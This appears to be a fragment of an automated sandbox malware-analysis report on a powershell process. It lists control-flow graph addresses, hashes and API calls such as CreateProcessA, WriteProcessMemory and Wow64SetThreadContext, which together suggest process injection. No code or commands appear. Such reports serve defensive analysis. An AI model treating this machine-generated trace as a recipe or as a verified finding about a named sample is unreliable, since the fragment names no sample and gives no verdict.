                                                                                                                                    control_flow_graph 2547 77d7c74-77d7c7d 2548 77d7c87-77d7c88 2547->2548 2549 77d7c80-77d7c86 2547->2549 2550 77d7cbd-77d7cf0 2548->2550 2551 77d7c89-77d7cbb 2548->2551 2549->2548 2553 77d7d29-77d7d49 2550->2553 2554 77d7cf2-77d7cfc 2550->2554 2551->2550 2561 77d7d4b-77d7d55 2553->2561 2562 77d7d82-77d7dbc 2553->2562 2554->2553 2555 77d7cfe-77d7d00 2554->2555 2556 77d7d23-77d7d26 2555->2556 2557 77d7d02-77d7d0c 2555->2557 2556->2553 2559 77d7d0e 2557->2559 2560 77d7d10-77d7d1f 2557->2560 2559->2560 2560->2560 2563 77d7d21 2560->2563 2561->2562 2564 77d7d57-77d7d59 2561->2564 2568 77d7dbe-77d7dc8 2562->2568 2569 77d7df5-77d7e6a CreateProcessA 2562->2569 2563->2556 2566 77d7d7c-77d7d7f 2564->2566 2567 77d7d5b-77d7d65 2564->2567 2566->2562 2570 77d7d69-77d7d78 2567->2570 2571 77d7d67 2567->2571 2568->2569 2572 77d7dca-77d7dcc 2568->2572 2581 77d7e6c-77d7e72 2569->2581 2582 77d7e73-77d7ebb 2569->2582 2570->2570 2573 77d7d7a 2570->2573 2571->2570 2574 77d7def-77d7df2 2572->2574 2575 77d7dce-77d7dd8 2572->2575 2573->2566 2574->2569 2577 77d7ddc-77d7deb 2575->2577 2578 77d7dda 2575->2578 2577->2577 2579 77d7ded 2577->2579 2578->2577 2579->2574 2581->2582 2587 77d7ebd-77d7ec1 2582->2587 2588 77d7ecb-77d7ecf 2582->2588 2587->2588 2589 77d7ec3 2587->2589 2590 77d7edf-77d7ee3 2588->2590 2591 77d7ed1-77d7ed5 2588->2591 2589->2588 2592 77d7ee5-77d7ee9 2590->2592 2593 77d7ef3 2590->2593 2591->2590 2594 77d7ed7 2591->2594 2592->2593 2595 77d7eeb 2592->2595 2596 77d7ef4 2593->2596 2594->2590 2595->2593 2596->2596
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 077D7E5A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2676123374.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77d0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 963392458-0
                                                                                                                                    • Opcode ID: c505466b13679064531cdc136cdedeff0d6e63fff680ea53b70eefeeb2705e54
                                                                                                                                    • Instruction ID: f05253e3a15a7284ec419abfcfef603bf2794718888613e1c52bfcebb89cb4d4
                                                                                                                                    • Opcode Fuzzy Hash: c505466b13679064531cdc136cdedeff0d6e63fff680ea53b70eefeeb2705e54
                                                                                                                                    • Instruction Fuzzy Hash: 398179B1D0074A8FDB14CFA9C8917ADBBF1EF48350F24852AE858A7284D7749892CB81

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 2597 77d7c80-77d7c88 2599 77d7cbd-77d7cf0 2597->2599 2600 77d7c89-77d7cbb 2597->2600 2602 77d7d29-77d7d49 2599->2602 2603 77d7cf2-77d7cfc 2599->2603 2600->2599 2610 77d7d4b-77d7d55 2602->2610 2611 77d7d82-77d7dbc 2602->2611 2603->2602 2604 77d7cfe-77d7d00 2603->2604 2605 77d7d23-77d7d26 2604->2605 2606 77d7d02-77d7d0c 2604->2606 2605->2602 2608 77d7d0e 2606->2608 2609 77d7d10-77d7d1f 2606->2609 2608->2609 2609->2609 2612 77d7d21 2609->2612 2610->2611 2613 77d7d57-77d7d59 2610->2613 2617 77d7dbe-77d7dc8 2611->2617 2618 77d7df5-77d7e6a CreateProcessA 2611->2618 2612->2605 2615 77d7d7c-77d7d7f 2613->2615 2616 77d7d5b-77d7d65 2613->2616 2615->2611 2619 77d7d69-77d7d78 2616->2619 2620 77d7d67 2616->2620 2617->2618 2621 77d7dca-77d7dcc 2617->2621 2630 77d7e6c-77d7e72 2618->2630 2631 77d7e73-77d7ebb 2618->2631 2619->2619 2622 77d7d7a 2619->2622 2620->2619 2623 77d7def-77d7df2 2621->2623 2624 77d7dce-77d7dd8 2621->2624 2622->2615 2623->2618 2626 77d7ddc-77d7deb 2624->2626 2627 77d7dda 2624->2627 2626->2626 2628 77d7ded 2626->2628 2627->2626 2628->2623 2630->2631 2636 77d7ebd-77d7ec1 2631->2636 2637 77d7ecb-77d7ecf 2631->2637 2636->2637 2638 77d7ec3 2636->2638 2639 77d7edf-77d7ee3 2637->2639 2640 77d7ed1-77d7ed5 2637->2640 2638->2637 2641 77d7ee5-77d7ee9 2639->2641 2642 77d7ef3 2639->2642 2640->2639 2643 77d7ed7 2640->2643 2641->2642 2644 77d7eeb 2641->2644 2645 77d7ef4 2642->2645 2643->2639 2644->2642 2645->2645
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 077D7E5A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2676123374.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77d0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 963392458-0
                                                                                                                                    • Opcode ID: 82eb880156ee1b0031196fa98eecd94b308f9ea08cdaa337ee294241183552e3
                                                                                                                                    • Instruction ID: 1f9ad8a8943758e27db8892eee8dd3fcdc73b3185af9992c765f3b72e3238462
                                                                                                                                    • Opcode Fuzzy Hash: 82eb880156ee1b0031196fa98eecd94b308f9ea08cdaa337ee294241183552e3
                                                                                                                                    • Instruction Fuzzy Hash: 898168B1D0064A9FDB24CFA9C8817EDBBF2FF48354F24852AE819E7244D7749891CB81

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 2646 77c6ef4-77c6ef6 2647 77c6eff-77c6f01 2646->2647 2648 77c6ef8-77c6efa 2646->2648 2650 77c6f03-77c6f5e 2647->2650 2649 77c6efc-77c6efe 2648->2649 2648->2650 2649->2647 2653 77c6f97-77c6ff9 CreateFileA 2650->2653 2654 77c6f60-77c6f6a 2650->2654 2663 77c6ffb-77c7001 2653->2663 2664 77c7002-77c7042 2653->2664 2654->2653 2655 77c6f6c-77c6f6e 2654->2655 2656 77c6f70-77c6f7a 2655->2656 2657 77c6f91-77c6f94 2655->2657 2659 77c6f7c 2656->2659 2660 77c6f7e-77c6f8d 2656->2660 2657->2653 2659->2660 2660->2660 2661 77c6f8f 2660->2661 2661->2657 2663->2664 2669 77c7044-77c7048 2664->2669 2670 77c7052 2664->2670 2669->2670 2671 77c704a 2669->2671 2672 77c7053 2670->2672 2671->2670 2672->2672
                                                                                                                                    APIs
                                                                                                                                    • CreateFileA.KERNELBASE(?,?,?,?,?,?,?), ref: 077C6FE9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2675965538.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77c0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                    • Opcode ID: 0a5082e3a50f5217ac9b844f243b5a380bd8cade5530e508fccda90c39bdaa64
                                                                                                                                    • Instruction ID: 1f5f3fe27b1e3f3d60ab30abd3d9917efb5212494f717c79b2b7ce7a24907a2f
                                                                                                                                    • Opcode Fuzzy Hash: 0a5082e3a50f5217ac9b844f243b5a380bd8cade5530e508fccda90c39bdaa64
                                                                                                                                    • Instruction Fuzzy Hash: 544167B1D102099FDB14CFA9D881BDEBFB5EF48350F14842EE815A7254DB759482CF81

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 2673 77c72f4-77c72f6 2674 77c72ff-77c7301 2673->2674 2675 77c72f8-77c72fa 2673->2675 2677 77c7303-77c7361 2674->2677 2676 77c72fc-77c72fe 2675->2676 2675->2677 2676->2674 2680 77c739a-77c73f7 CreateFileMappingA 2677->2680 2681 77c7363-77c736d 2677->2681 2690 77c73f9-77c73ff 2680->2690 2691 77c7400-77c7440 2680->2691 2681->2680 2682 77c736f-77c7371 2681->2682 2684 77c7394-77c7397 2682->2684 2685 77c7373-77c737d 2682->2685 2684->2680 2686 77c737f 2685->2686 2687 77c7381-77c7390 2685->2687 2686->2687 2687->2687 2689 77c7392 2687->2689 2689->2684 2690->2691 2696 77c7450 2691->2696 2697 77c7442-77c7446 2691->2697 2699 77c7451 2696->2699 2697->2696 2698 77c7448 2697->2698 2698->2696 2699->2699
                                                                                                                                    APIs
                                                                                                                                    • CreateFileMappingA.KERNEL32(?,?,?,?,?,?), ref: 077C73E7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2675965538.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77c0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFileMapping
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 524692379-0
                                                                                                                                    • Opcode ID: ab8d17e54e6022f28b6d7fafcec7bf4c8f30114cff8acb4a4b6e20a781b33f74
                                                                                                                                    • Instruction ID: 54e24636857568b2b15440b6941074efa6da0268661c8a37849113425e25f628
                                                                                                                                    • Opcode Fuzzy Hash: ab8d17e54e6022f28b6d7fafcec7bf4c8f30114cff8acb4a4b6e20a781b33f74
                                                                                                                                    • Instruction Fuzzy Hash: 884175B1D102499FDB18CFA9C8817DEBFB5EF48360F14882EE819AB254DB749446CF81

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 2700 77c6f00-77c6f5e 2703 77c6f97-77c6ff9 CreateFileA 2700->2703 2704 77c6f60-77c6f6a 2700->2704 2713 77c6ffb-77c7001 2703->2713 2714 77c7002-77c7042 2703->2714 2704->2703 2705 77c6f6c-77c6f6e 2704->2705 2706 77c6f70-77c6f7a 2705->2706 2707 77c6f91-77c6f94 2705->2707 2709 77c6f7c 2706->2709 2710 77c6f7e-77c6f8d 2706->2710 2707->2703 2709->2710 2710->2710 2711 77c6f8f 2710->2711 2711->2707 2713->2714 2719 77c7044-77c7048 2714->2719 2720 77c7052 2714->2720 2719->2720 2721 77c704a 2719->2721 2722 77c7053 2720->2722 2721->2720 2722->2722
                                                                                                                                    APIs
                                                                                                                                    • CreateFileA.KERNELBASE(?,?,?,?,?,?,?), ref: 077C6FE9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2675965538.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77c0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                    • Opcode ID: 57040fff96d105f7a77c262debb7547419592095a8927bdfbeabc747db21c823
                                                                                                                                    • Instruction ID: b0c91a3342dce3b9d93549f034384b3ad13691b3b4c9496d774b3c7d06b66503
                                                                                                                                    • Opcode Fuzzy Hash: 57040fff96d105f7a77c262debb7547419592095a8927bdfbeabc747db21c823
                                                                                                                                    • Instruction Fuzzy Hash: E24155B1D102499FEB24CFA9C881B9EBFB5FF48350F14852DE815AB254DB759481CF81

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 2723 77c7300-77c7361 2726 77c739a-77c73f7 CreateFileMappingA 2723->2726 2727 77c7363-77c736d 2723->2727 2736 77c73f9-77c73ff 2726->2736 2737 77c7400-77c7440 2726->2737 2727->2726 2728 77c736f-77c7371 2727->2728 2730 77c7394-77c7397 2728->2730 2731 77c7373-77c737d 2728->2731 2730->2726 2732 77c737f 2731->2732 2733 77c7381-77c7390 2731->2733 2732->2733 2733->2733 2735 77c7392 2733->2735 2735->2730 2736->2737 2742 77c7450 2737->2742 2743 77c7442-77c7446 2737->2743 2745 77c7451 2742->2745 2743->2742 2744 77c7448 2743->2744 2744->2742 2745->2745
                                                                                                                                    APIs
                                                                                                                                    • CreateFileMappingA.KERNEL32(?,?,?,?,?,?), ref: 077C73E7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2675965538.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77c0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFileMapping
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 524692379-0
                                                                                                                                    • Opcode ID: c39bb063a03c28be5c720647e22622b8f82340f99569426d868c2a96a5845ee2
                                                                                                                                    • Instruction ID: 3a4b47338f180034c6846b356ffc0ddb8b06e3ce3625d083d181ef6fbfe23657
                                                                                                                                    • Opcode Fuzzy Hash: c39bb063a03c28be5c720647e22622b8f82340f99569426d868c2a96a5845ee2
                                                                                                                                    • Instruction Fuzzy Hash: 774165B1D102499FDB14CFA9C881B9EBFB5FF48350F14892EE819AB254DB749441CF81
                                                                                                                                    APIs
                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 077D8406
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2676123374.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77d0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 983334009-0
                                                                                                                                    • Opcode ID: f4e4e422e790f56a5ea5d4821da79c077cd514cc82cbc0375760038ce4f97bb2
                                                                                                                                    • Instruction ID: d3597cce4aaa331c41114aad84de45511c4f800a4d0c19913cd755849da8c62c
                                                                                                                                    • Opcode Fuzzy Hash: f4e4e422e790f56a5ea5d4821da79c077cd514cc82cbc0375760038ce4f97bb2
                                                                                                                                    • Instruction Fuzzy Hash: 29214AB1D102499FDB50CFAAC5857EEBFF4EF48324F24882AD459B7240C7789945CBA1
                                                                                                                                    APIs
                                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 077D8CC8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2676123374.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77d0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3559483778-0
                                                                                                                                    • Opcode ID: d779bc9a04497bdb46f11731aaebbf7035661bc8b472ddfff7f54fc565f86ef9
                                                                                                                                    • Instruction ID: 925d354b5484ddf93d546ce6cb2b5312eab603b9c07637c37514191b008f0d59
                                                                                                                                    • Opcode Fuzzy Hash: d779bc9a04497bdb46f11731aaebbf7035661bc8b472ddfff7f54fc565f86ef9
                                                                                                                                    • Instruction Fuzzy Hash: 8C2148B1900349DFDB10CFA9C981BEEBBF5FF48310F14882AE519A7240D7789941DB61
                                                                                                                                    APIs
                                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 077D8CC8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2676123374.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77d0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3559483778-0
                                                                                                                                    • Opcode ID: e0fd1e721a6b4f2c255e10f81b2f8831c048d4c7f1f9187546146d6371021572
                                                                                                                                    • Instruction ID: c9cc583dad97d08680db6d7d02e2df0092083f55af2733d51551b0a64d0e0131
                                                                                                                                    • Opcode Fuzzy Hash: e0fd1e721a6b4f2c255e10f81b2f8831c048d4c7f1f9187546146d6371021572
                                                                                                                                    • Instruction Fuzzy Hash: 88212AB1901309DFDB10DFA9C985BDEBBF5FF48320F148829E519A7240D7789944DBA1
                                                                                                                                    APIs
                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 077D8406
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2676123374.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77d0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 983334009-0
                                                                                                                                    • Opcode ID: 7b319546b1352482eafb2b53fcddae5af231f81e2883df00e5cd3f07eb7dad15
                                                                                                                                    • Instruction ID: e66e068731d5225cbd0c8e30c716cb1a57f177bd9259b2ab769c65ea3329e71c
                                                                                                                                    • Opcode Fuzzy Hash: 7b319546b1352482eafb2b53fcddae5af231f81e2883df00e5cd3f07eb7dad15
                                                                                                                                    • Instruction Fuzzy Hash: ED2138B1D003099FDB10DFAAC5857EEBBF4EF88324F14842AD419A7240CB789945CFA1
                                                                                                                                    APIs
                                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 03172B0D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2607556676.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_3170000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3559483778-0
                                                                                                                                    • Opcode ID: 72d617851d7b74070902d6e4bb57cd78bea0ee3829f9776db5c55ad87d6bd220
                                                                                                                                    • Instruction ID: 12a48f4350c518f0723dfd9dd22535b303dff8f34e35e840db7733a980623a77
                                                                                                                                    • Opcode Fuzzy Hash: 72d617851d7b74070902d6e4bb57cd78bea0ee3829f9776db5c55ad87d6bd220
                                                                                                                                    • Instruction Fuzzy Hash: 4521E2B5900259DFCB10CF99D985ADEBBF4FB48320F14852AE919A7350C378A945CBA0
                                                                                                                                    APIs
                                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 03172B0D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2607556676.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_3170000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3559483778-0
                                                                                                                                    • Opcode ID: 7e073c03ba6782ad01f2a982b41b4471e8965a95a331d0b2a6617232f83896a1
                                                                                                                                    • Instruction ID: d51f427ee1f7060505fb9e3057392adaf44ae505fefd67c0cdc8cc62112301fd
                                                                                                                                    • Opcode Fuzzy Hash: 7e073c03ba6782ad01f2a982b41b4471e8965a95a331d0b2a6617232f83896a1
                                                                                                                                    • Instruction Fuzzy Hash: 6C21EFB59003499FCB10CF9AD985ADEFBF4FB48320F14842AE919A7250D374A945CBA0
                                                                                                                                    APIs
                                                                                                                                    • MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 077C76E6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2675965538.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77c0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileView
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3314676101-0
                                                                                                                                    • Opcode ID: bfac51484526e6cc2b013f35d98336f1c60b0ca3d009812d45c092bd46f49358
                                                                                                                                    • Instruction ID: f59fa782d7bc4bbd22721f975b3aca386404a626ccfdac2ae3c1427a397d9413
                                                                                                                                    • Opcode Fuzzy Hash: bfac51484526e6cc2b013f35d98336f1c60b0ca3d009812d45c092bd46f49358
                                                                                                                                    • Instruction Fuzzy Hash: 6E1189B29002099FCB10CFAAC845BDEBFF5EF88324F24881AE519B7200CB759540CFA1
                                                                                                                                    APIs
                                                                                                                                    • MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 077C76E6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2675965538.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77c0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileView
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3314676101-0
                                                                                                                                    • Opcode ID: d5ead17399c0f5a4ff0e01449ef9630d1e5e6990bcfd95a271061a8bc02b9a69
                                                                                                                                    • Instruction ID: 498e4c7aafaf60b317cd7388c9ad7c0f8fe15e3a0bd242458f7be46a0c89fa20
                                                                                                                                    • Opcode Fuzzy Hash: d5ead17399c0f5a4ff0e01449ef9630d1e5e6990bcfd95a271061a8bc02b9a69
                                                                                                                                    • Instruction Fuzzy Hash: 47113AB19002499FDB10DFAAC845BDEFFF5EF88324F248819E519A7250CB759540DFA1
                                                                                                                                    APIs
                                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 03172B0D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2607556676.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_3170000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3559483778-0
                                                                                                                                    • Opcode ID: d77fd04c5b546b281356b745aafd008920b78933c34a4e4343c2b4663fe3ee98
                                                                                                                                    • Instruction ID: 31207c22ae37127cea68f0b24a3222ea2aca54c1c43c15e2d12ed4ea7ba867cc
                                                                                                                                    • Opcode Fuzzy Hash: d77fd04c5b546b281356b745aafd008920b78933c34a4e4343c2b4663fe3ee98
                                                                                                                                    • Instruction Fuzzy Hash: E1F034B2804348DEDB21DF99D848BCAFFF4EF5D325F18844AD059A7591C378614ADB21
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2674865150.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_75d0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (odq
                                                                                                                                    • API String ID: 0-567950297
                                                                                                                                    • Opcode ID: ef1f88e28884c33774aa97141b7e9e835357314139f884ff2c443059ed8707f7
                                                                                                                                    • Instruction ID: fd18752e1fd500b38d673ad1883af72a023d06f06a569c26804404e969f7c359
                                                                                                                                    • Opcode Fuzzy Hash: ef1f88e28884c33774aa97141b7e9e835357314139f884ff2c443059ed8707f7
                                                                                                                                    • Instruction Fuzzy Hash: 462168B0A0124AEFDB34CF5DC845BEA7BB2BB41361F08856AE4158B290D771FD80CB91
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2679169572.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ae0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: tPdq
                                                                                                                                    • API String ID: 0-2402691438
                                                                                                                                    • Opcode ID: 4029e10153a456627f05a4cabc0bf80c51d8840e19c247480dd4a8c6d02abb8c
                                                                                                                                    • Instruction ID: ec43777e8b6f795f79651a992da1b426d2716405100b003e67fde258f3335ad5
                                                                                                                                    • Opcode Fuzzy Hash: 4029e10153a456627f05a4cabc0bf80c51d8840e19c247480dd4a8c6d02abb8c
                                                                                                                                    • Instruction Fuzzy Hash: 88115BB07002185BDB20A7A988117AE76D79FC4718F20841DE904DF3C0CD759D418369
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2674865150.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_75d0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'dq
                                                                                                                                    • API String ID: 0-1167855494
                                                                                                                                    • Opcode ID: d692992cda99d1afb69edfa2e6febcfb6da375c0b09835da57c433f3bc2daf6d
                                                                                                                                    • Instruction ID: dcf3dbfd854fcfbfbaf8c1b767c6f478d0ed7d8195826c7e600eec606d02e1e5
                                                                                                                                    • Opcode Fuzzy Hash: d692992cda99d1afb69edfa2e6febcfb6da375c0b09835da57c433f3bc2daf6d
                                                                                                                                    • Instruction Fuzzy Hash: 11114CF0A002099FDB70DFADC8406AABBE6BF85351F1484AAD815CB290EB31ED45C791
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2679169572.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ae0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7f02a1d4ef6ad7fa2b0cbe5f99c0df2328ffec83095e1fec5249140e92bbff3a
                                                                                                                                    • Instruction ID: 639738e246e6f2fa155653b521f8754f9fa95b757db568a107a12c1d703b6df0
                                                                                                                                    • Opcode Fuzzy Hash: 7f02a1d4ef6ad7fa2b0cbe5f99c0df2328ffec83095e1fec5249140e92bbff3a
                                                                                                                                    • Instruction Fuzzy Hash: F4324DB5B00214CFDB54CB68C851BA9BBB2EF89304F14C4A9D9099B752CB72ED81CF91
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2679169572.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ae0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 45c534286d97a896498f39a5a86c96e0b74e7436c5cde33cee679c5f82e95f13
                                                                                                                                    • Instruction ID: 05059363c2abd7ac3e8fd942145a3f55e8273f899311500ed246b1c71d877a59
                                                                                                                                    • Opcode Fuzzy Hash: 45c534286d97a896498f39a5a86c96e0b74e7436c5cde33cee679c5f82e95f13
                                                                                                                                    • Instruction Fuzzy Hash: E4123A75B00214CFDB54CB18C891BA9BBB2EF89314F14C499E9199B752CB72ED81CF91
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2610933736.0000000004D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D70000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_4d70000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 494ac65ef5bd9475f4dc9c12174679b72c50616f1cd8315bde0deb4e9c80f97e
                                                                                                                                    • Instruction ID: 2c41497a1d0664d34b4a35415c992c05f23e5f439b96253a1ce29edda9865f70
                                                                                                                                    • Opcode Fuzzy Hash: 494ac65ef5bd9475f4dc9c12174679b72c50616f1cd8315bde0deb4e9c80f97e
                                                                                                                                    • Instruction Fuzzy Hash: F2F17C74A012489FCB05CFA8D494A9DFBF2FF89310F258199E855AB361DB31ED46CB90
